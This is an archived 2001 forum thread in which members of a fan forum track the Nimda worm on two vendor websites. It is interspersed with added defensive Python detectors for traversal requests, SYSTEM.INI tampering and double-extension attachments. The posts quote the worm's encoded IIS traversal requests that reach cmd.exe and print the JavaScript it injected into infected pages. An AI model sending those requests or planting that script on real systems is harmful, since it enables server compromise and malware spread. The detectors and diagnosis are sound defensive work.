Unofficial empeg BBS

#38729 - 18/09/2001 07:37 Important - sonicblue.com and riohome.com
rob
carpal tunnel

Registered: 21/05/1999
Posts: 5335
Loc: Cambridge UK
We've just noticed that if you connect to www.sonicblue.com or www.riohome.com a file download (which may or may not be a virus) opens. It will extract and save a file called readme.exe - I suggest that you do not accept this file, and that you definitely do not execute it.

Our UK sysadmin people are waking up the US guys as I type, so this should get fixed soon.

Rob

#38730 - 18/09/2001 09:52 Re: Important - sonicblue.com and riohome.com [Re: rob]
Kit
journeyman

Registered: 03/10/2000
Posts: 69
Loc: San Diego, CA US
This is part of a larger IIS and IE problem (from Slashdot):

A new worm seems to be running rampant. Unlike Code Red, it attempts to hit boxes with many different exploits (including what looks like an attempt to exploit boxes still rooted by Code Red). It looks like each IP tries 16 attempts on its neighbors. There is also a new mail worm mailing WAV files or something with bits of what appears to be the registry... it may or may not be related. Got any words on this? Shut down those Windows boxes and stop opening attachments. And make that 21. Got another one while writing this story. All my hits are coming from 208.n.n.n (where I am). I'm sure it'll keep moving to nearby boxes.

Here are examples of the requests it's sending:

GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

While writing this story I was hit a total of 4 times, 16 GET attempts per attack, in only 4 minutes. Also of interest, my desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)

Update: Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!

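The requests Kit quotes only reach cmd.exe because IIS decoded them after checking the path: "%255c" is a double-encoded backslash, "%%35%63" is the same trick with one more layer, and "%c1%1c" is a malformed UTF-8 byte pair the decoder accepted as a separator. The following detector is an added example for log review, not code from the thread or from any product named here. The sample log lines are constructed (three mirror the post's requests), and the OVERLONG table is an assumption listing the two malformed sequences that appear on this page or are widely documented for that IIS bug.

```python
"""Normalise IIS request paths and flag traversal attempts like the ones quoted above."""
import re
from urllib.parse import unquote

# Constructed sample request lines: the first three mirror the post, the rest are benign.
SAMPLE_REQUESTS = [
    "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "GET /index.html",
    "GET /images/logo.gif",
]

# Assumption: malformed UTF-8 sequences the vulnerable IIS decoder treated as path separators.
OVERLONG = {"%c1%1c": "\\", "%c0%af": "/"}

# Binaries that no request should be able to reach through the web root.
SENSITIVE = ("cmd.exe",)


def normalize_path(raw: str) -> str:
    """Undo the encoding tricks: overlong UTF-8 first, then percent-decode until stable."""
    path = raw
    for seq, sep in OVERLONG.items():
        path = re.sub(re.escape(seq), lambda _m, sep=sep: sep, path, flags=re.IGNORECASE)
    # %255c -> %5c -> "\"  and  %%35%63 -> %5c -> "\"  (bounded loop, stops when nothing changes)
    for _ in range(4):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def escapes_webroot(norm_path: str) -> bool:
    """Walk the decoded segments; any '..' that climbs above the root is an escape."""
    depth = 0
    for seg in norm_path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def analyze_request(line: str) -> dict:
    """Parse 'METHOD path[?query]' and report what the request really asks for."""
    parts = line.split()
    method, target = (parts[0], parts[1]) if len(parts) >= 2 else ("", "")
    raw_path = target.split("?", 1)[0]
    norm = normalize_path(raw_path)
    escapes = escapes_webroot(norm)
    hits_sensitive = any(name in norm.lower() for name in SENSITIVE)
    return {
        "method": method,
        "raw": raw_path,
        "normalized": norm,
        "escapes_webroot": escapes,
        "targets_sensitive": hits_sensitive,
        "suspicious": escapes or hits_sensitive,
    }


def scan(lines):
    """Return only the suspicious findings, in log order."""
    return [r for r in (analyze_request(line) for line in lines) if r["suspicious"]]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(f'{finding["raw"]}\n  -> {finding["normalized"]}')
```

The point of decoding before judging is that a filter matching the literal string "../" never sees these requests; only the normalised path shows that each one climbs out of the web root and lands on cmd.exe.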
#38731 - 18/09/2001 09:58 Re: Important - sonicblue.com and riohome.com [Re: Kit]
phaigh
addict

Registered: 04/11/1999
Posts: 649
Loc: Reading, UK
Here is a URL.

Paul.

Paul Haigh, Reg. 4120
(mk1) 6GB, Blue, 00254
(mk2) 12GB, Red, 00357
#38732 - 18/09/2001 10:28 Re: Important - sonicblue.com and riohome.com [Re: Kit]
bmiller
member

Registered: 11/04/2001
Posts: 150
Loc: Sacramento, CA, USA
Tell us how you really feel about Microsoft products.
I don't think it's as bad as you make it sound.
Here's Symantec's explanation: W32.Nimda.A@mm

#38733 - 18/09/2001 11:01 Re: Important - sonicblue.com and riohome.com [Re: bmiller]
drakino
carpal tunnel

Registered: 08/06/1999
Posts: 7868
I don't think it's as bad as you make it sound.

Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!


Hmm, due to bugs in two different MS products, this worm is running amok. And you don't see anything wrong here?

I'm watching it nail both my home firewall machine, and machines here at work. It's not fun. And realistically, the only way to stop it is to shut down the world wide web. Everyone back to gopher...

#38734 - 18/09/2001 11:07 Re: Important - sonicblue.com and riohome.com [Re: drakino]
rob
carpal tunnel

Registered: 21/05/1999
Posts: 5335
Loc: Cambridge UK
I'm running IE 5.00 SP2 and it is not automatically running the executable.

Rob

#38735 - 18/09/2001 11:09 Re: Important - sonicblue.com and riohome.com [Re: drakino]
bmiller
member

Registered: 11/04/2001
Posts: 150
Loc: Sacramento, CA, USA
Arguably, MS has the largest install base and very complex code.
That lends itself to exploit. Let's not pretend that other OSes don't have vulnerabilities.
How many Unix boxes out there still have the sendmail exploit available, and that's a decade old.
It's all about the Sysadmin.

#38736 - 18/09/2001 11:22 Re: Important - sonicblue.com and riohome.com [Re: rob]
drakino
carpal tunnel

Registered: 08/06/1999
Posts: 7868
I've seen both IE 4 and 5.5 run that e-mail attachment automatically here. It's a mess here at my company right now. I'm still wondering when the IT guys are going to notice and shut down port 80 again, except to verified worm-free servers again.

Usually when I have seen it, IE pops open a new window on the taskbar, with the text mshtml:// or something similar to that. I believe it depends on how your system accepts .eml files.

Update:
I just grabbed this from the bottom of a page here that is infected:
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

Edited by Drakino on 18/09/01 07:35 PM.

#38737 - 18/09/2001 11:32 Re: Important - sonicblue.com and riohome.com [Re: bmiller]
drakino
carpal tunnel

Registered: 08/06/1999
Posts: 7868
Arguably, MS has the largest install base and very complex code.
That lends itself to exploit. Let's not pretend that other OSes don't have vulnerabilities.
How many Unix boxes out there still have the sendmail exploit available, and that's a decade old.
It's all about the Sysadmin.


Agreed to some point. Apache actually still leads the web server market, although IIS is gaining quite a bit of ground.

As far as "It's all about the sysadmin", yes it is. I'm just always amazed at how many new MS exploits appear, and how long it takes for a fix to be released. Then you have the issue that almost no MS admin, not even the MCSEs, knows about hotfixes.

If Microsoft wants the desktop market, they need to have child-proof security built in. Expecting a home user to be a sysadmin is not the right thing. Let's bring up the car analogy. How many people out there only know how to drive their cars, and not repair them? Quite a few. But that industry knows that, so they provide easy instructions for common things, like filling the tank, or changing the wiper blades. Compare that to Microsoft, who only shows off their products' "new and improved" features, instead of teaching them they need to click on "Windows Update" every once in a while. They are getting better, but more work is needed if we want to keep the internet in a usable form down the road.

#38738 - 18/09/2001 14:15 Re: Important - sonicblue.com and riohome.com [Re: drakino]
SE_Sport_Driver
carpal tunnel

Registered: 05/01/2001
Posts: 4903
Loc: Detroit, MI USA
If the fix from Microsoft, issued back in Oct. 2000, was installed, would servers be infected? We got hit here at work, and I'm curious as to whether the damage was avoidable....

We use these computers for broadcasting... imagine a dozen live TV studios taking a dump because of this....

Basically, our NT boxes would eventually do a physical memory dump and reboot. After rebooting, the system would look for Outlook to email the virus. But, we were smart enough to not install Outlook on these workstations.... still a mess.

32GB Mk. II in a WRX
Detroit, MI USA
www.PfeifferBeer.com
_________________________
Brad B.

#38739 - 18/09/2001 14:37 Re: Important - sonicblue.com and riohome.com [Re: SE_Sport_Driver]
tfabris
carpal tunnel

Registered: 20/12/1999
Posts: 31565
Loc: Seattle, WA
If the fix from Microsoft, issued back in Oct. 2000 was installed, would servers be infected?

I get the impression that it works like this:

- If you're running IIS, and the server hasn't been patched, the server can be infected from the web.

- If you're not running IIS, but someone on your internal network connects to an infected server, they might spread it on your internal network if they execute the file the server offers them.

- The virus can also be spread via e-mail executables.

Although the details at the web sites are still sketchy, I have just issued this message to my LAN users:

In reply to:

More information on the new worm has been posted at the Network Associates (McAfee) site:

http://vil.nai.com/vil/virusSummary.asp?virus_k=99209

One of the things that the virus apparently does is to alter your SYSTEM.INI file. The line:

Shell=explorer.exe

Gets changed to

Shell=explorer.exe load.exe -dontrunold

If your machine appears to be behaving strangely or slowly, please check your system.ini file. If you find this alteration, please let me know so that I can gauge if there is any possible threat to our internal network.

Note that the Shell= line might not exist on some NT/2K systems. This is OK. It's only the altered version that indicates the presence of the virus.

___________
Tony Fabris

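Tony's SYSTEM.INI check is easy to script so it can be run across a LAN rather than eyeballed. The code below is an added example, not Tony's nor the BBS's; it assumes the Shell= entry sits in the [boot] section, which is where Windows 9x keeps it, and the three INI texts are constructed. It distinguishes the NT/2K case Tony mentions (line absent, which is normal) from the altered line that does indicate infection.

```python
"""Classify a SYSTEM.INI's Shell= entry as clean, altered, or absent."""
import sys

EXPECTED_SHELL = "explorer.exe"

# Constructed samples.
CLEAN_INI = """[boot]
shell=explorer.exe
drivers=mmsystem.dll
[386Enh]
device=*vpowerd
"""

ALTERED_INI = """[boot]
; comment lines like this one are skipped
Shell=explorer.exe load.exe -dontrunold
drivers=mmsystem.dll
"""

NT_INI = """[drivers]
wave=mmdrv.dll
timer=timer.drv
"""


def shell_entry(ini_text: str):
    """Return the raw value of Shell= in the [boot] section, or None if the line is absent."""
    section = None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "boot" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip().lower() == "shell":
            return value.strip()
    return None


def check_shell(ini_text: str) -> dict:
    """'absent' is normal on NT/2K; 'clean' is bare explorer.exe; anything else is 'altered'."""
    value = shell_entry(ini_text)
    if value is None:
        return {"status": "absent", "value": None, "extra": []}
    tokens = value.split()
    # Whatever is not the expected shell is the payload the worm appended (or a replaced shell).
    extra = [t for t in tokens if t.lower() != EXPECTED_SHELL]
    if tokens and not extra:
        return {"status": "clean", "value": value, "extra": []}
    return {"status": "altered", "value": value, "extra": extra}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real use: python check_shell.py C:\WINDOWS\SYSTEM.INI
        with open(sys.argv[1], encoding="latin-1") as fh:
            print(check_shell(fh.read()))
    else:
        for label, text in (("clean", CLEAN_INI), ("altered", ALTERED_INI), ("nt", NT_INI)):
            print(label, check_shell(text))
```

Matching is case-insensitive on both the section name and the key because the file is hand-edited on many machines and "Shell=" versus "shell=" carries no meaning to Windows.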
#38740 - 18/09/2001 22:58 Re: Important - sonicblue.com and riohome.com [Re: tfabris]
Dignan
carpal tunnel

Registered: 08/03/2000
Posts: 12318
Loc: Sterling, VA
Could someone tell me what this virus does? I'm very curious because all of a sudden I appear to be having a problem with my image files. It seems they've been renamed like this: pic1.jpg.vbs

When I remove the .vbs extension the file is unreadable by PSP. It also appears that some of my MP3s are affected but not all.

What's going on!?!? I'm freaking out here!

DiGNAN
Ob-La-Di, Ob-La-Da, etc.
_________________________
Matt

#38741 - 18/09/2001 23:02 Re: Important - sonicblue.com and riohome.com [Re: Dignan]
Dignan
carpal tunnel

Registered: 08/03/2000
Posts: 12318
Loc: Sterling, VA
I'm sorry, it seems that this might be a different virus. I received it via an email attachment, but this one was called LIROTOPE.GIF.vbs, not readme.txt as many warnings are saying. I stupidly opened it. Is there anything I can do?? Has anyone heard of this one?

DiGNAN
Ob-La-Di, Ob-La-Da, etc.
_________________________
Matt

#38742 - 18/09/2001 23:06 Re: Important - sonicblue.com and riohome.com [Re: Dignan]
tfabris
carpal tunnel

Registered: 20/12/1999
Posts: 31565
Loc: Seattle, WA
That sounds like the behavior of a pretty old virus that's reasonably well known.

You can run a piece of virus scanning software that will also clean the system for you.

I am partial to McAfee VirusScan (recently purchased by Network Associates), which can be purchased at www.nai.com. However, just about any virus scanner can clean that one for you.

___________
Tony Fabris

#38743 - 18/09/2001 23:13 Re: Important - sonicblue.com and riohome.com [Re: tfabris]
Dignan
carpal tunnel

Registered: 08/03/2000
Posts: 12318
Loc: Sterling, VA
Phew, thanks. I was worried, what with this new virus talk.

Hehe, and thanks for being on at 2AM, although I guess for you it's what, 11?

DiGNAN
Ob-La-Di, Ob-La-Da, etc.
_________________________
Matt

#38744 - 18/09/2001 23:51 Re: Important - sonicblue.com and riohome.com [Re: drakino]
drakino
carpal tunnel

Registered: 08/06/1999
Posts: 7868
Just to give people an idea of the seriousness of the past few worms, I offer this bit from my home security report on it:

31730 total attacks, 3015 unique hosts
169 CodeRed Version 1 attacks
6920 CodeRed Version 2 attacks
0 CodeRed Version Unknown attacks
24641 Nimda attacks (Roughly 1449 every hour, or 24 a minute)

all on one little IP...

#38745 - 19/09/2001 10:13 Re: Important - sonicblue.com and riohome.com [Re: drakino]
Kit
journeyman

Registered: 03/10/2000
Posts: 69
Loc: San Diego, CA US
Here is the part that is bothersome. www.sonicblue.com and www.riohome.com are still down. These websites were left unpatched to security holes that have been known for months.

For all we know all users who recently purchased tuners could have had their credit card numbers stolen.

It goes without saying that this is of no fault to the Empeg folks.

-Kit

#38746 - 19/09/2001 10:16 Re: Important - sonicblue.com and riohome.com [Re: Kit]
tfabris
carpal tunnel

Registered: 20/12/1999
Posts: 31565
Loc: Seattle, WA
For all we know all users who recently purchased tuners could have had their credit card numbers stolen.

Unlikely, as those were handled through Digital River, not through SonicBlue.

In any case, it's rare for a web server to be the same machine as the one that stores the financial transaction data, so even if a web server is compromised, it doesn't necessarily mean any user data was compromised.

That's not to say that this sort of thing hasn't ever happened. Doug Burnside can testify that it has, indeed happened to some companies in the past.

___________
Tony Fabris

#38747 - 19/09/2001 10:19 Re: Important - sonicblue.com and riohome.com [Re: Kit]
rob
carpal tunnel

Registered: 21/05/1999
Posts: 5335
Loc: Cambridge UK
The hosting of both of these sites is contracted out (to a very major hosting company - you can work out who quite easily). The sites have been taken down while the files are fixed up and servers get patched.

Needless to say, nobody is happy with the situation.

As Tony said, the store is contracted out to Digital River who do not appear to have been affected. store.sonicblue.com is still online.

Rob

#38748 - 19/09/2001 18:15 Re: Important - sonicblue.com and riohome.com [Re: rob]
SE_Sport_Driver
carpal tunnel

Registered: 05/01/2001
Posts: 4903
Loc: Detroit, MI USA
Is it pretty safe to assume that any file with a "double" file extension is a warning sign? I have received a few in the past, but the filename.xxx.exe or filename.xxx.doc was always a tip-off to me....

Went in to work today, and we are completely crippled... I spent the day helping our support person install new drives... all of our network connections, even LAN, have been disabled until we narrow this down.

32GB Mk. II in a WRX
Detroit, MI USA
www.PfeifferBeer.com
_________________________
Brad B.

#38749 - 19/09/2001 18:23 Re: Important - sonicblue.com and riohome.com [Re: SE_Sport_Driver]
tfabris
carpal tunnel

Registered: 20/12/1999
Posts: 31565
Loc: Seattle, WA
Is it pretty safe to assume that any file with a "double" file extension is a warning sign?

Yes, for the most part. Especially if the second extension is an executable of some kind (.vbs is most common).

Of course, as far as I'm concerned, the presence of Outlook on the hard disk is a warning sign...

___________
Tony Fabris

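The "double extension" rule Brad and Tony discuss can be made precise: a name is most dangerous when the last extension is one Windows will execute and the one before it is a harmless-looking document or image type, as in pic1.jpg.vbs or LIROTOPE.GIF.vbs from earlier in the thread. This triage function is an added example, not code from the thread; the two extension sets are assumptions (common executable types and common decoy types), and the sample names are constructed, two of them modelled on names mentioned above. It also catches the padding variant, where spaces are inserted before the real extension so it scrolls out of a narrow attachment column.

```python
"""Triage attachment names by extension pattern."""
import os

# Assumed lists: types Windows executes when opened, and document/image types used as decoys.
EXECUTABLE_EXT = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd",
                  ".vbs", ".vbe", ".js", ".jse", ".wsh", ".wsf", ".hta"}
DECOY_EXT = {".jpg", ".jpeg", ".gif", ".bmp", ".txt", ".doc", ".xls",
             ".mp3", ".wav", ".pdf", ".htm", ".html"}

# Constructed sample attachment names; the first two mirror names mentioned in the thread.
SAMPLE_NAMES = [
    "pic1.jpg.vbs",
    "LIROTOPE.GIF.vbs",
    "readme.exe",
    "report.final.doc",
    "holiday.jpg",
    "README",
    "invoice.txt                              .exe",
]

RISK = {
    "deceptive_double_extension": "high",
    "executable": "high",
    "double_extension": "low",
    "ok": "none",
    "no_extension": "none",
}


def extensions(name: str) -> list:
    """Every extension after the first dot, lower-cased, with padding spaces removed."""
    base = os.path.basename(name.replace("\\", "/"))
    parts = [p.strip().lower() for p in base.split(".")[1:]]
    return ["." + p for p in parts if p]


def classify(name: str) -> str:
    """Name the pattern so the caller can explain the verdict, not just flag it."""
    exts = extensions(name)
    if not exts:
        return "no_extension"
    if exts[-1] in EXECUTABLE_EXT:
        if len(exts) >= 2 and exts[-2] in DECOY_EXT:
            return "deceptive_double_extension"   # e.g. pic1.jpg.vbs
        return "executable"                        # e.g. readme.exe
    if len(exts) >= 2:
        return "double_extension"                  # e.g. report.final.doc: odd, not executable
    return "ok"


def is_warning_sign(name: str) -> bool:
    """Tony's answer in code: yes for the most part, especially when it ends in an executable."""
    return RISK[classify(name)] != "none"


def triage(names):
    """(name, pattern, risk) for every name, so a mail gateway can log the reason it quarantined."""
    return [(n, classify(n), RISK[classify(n)]) for n in names]


if __name__ == "__main__":
    for name, pattern, risk in triage(SAMPLE_NAMES):
        print(f"{risk:5} {pattern:27} {name!r}")
```

Strip the padding before splitting, not after: "invoice.txt                              .exe" must come out as .txt followed by .exe, which is the same pattern as the unpadded name and deserves the same verdict.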
#38750 - 20/09/2001 02:32 Re: Important - sonicblue.com and riohome.com [Re: tfabris]
BartDG
carpal tunnel

Registered: 20/05/2001
Posts: 2616
Loc: Bruges, Belgium
Of course, as far as I'm concerned, the presence of Outlook on the hard disk is a warning sign...

Very true. I've always used Eudora and as such have always been spared, since practically all viruses nowadays are coded to work with Outlook and only Outlook.
I don't mind

_________________________
Riocar 80gig S/N : 010101580 red
Riocar 80gig (010102106) - backup

#38751 - 20/09/2001 07:13 Re: Important - sonicblue.com and riohome.com [Re: BartDG]
SE_Sport_Driver
carpal tunnel

Registered: 05/01/2001
Posts: 4903
Loc: Detroit, MI USA
Here at work, we specifically don't have Outlook installed and use Lotus Notes instead. We were still hit. It took longer to spread, but it still did.

32GB Mk. II in a WRX
Detroit, MI USA
www.PfeifferBeer.com
_________________________
Brad B.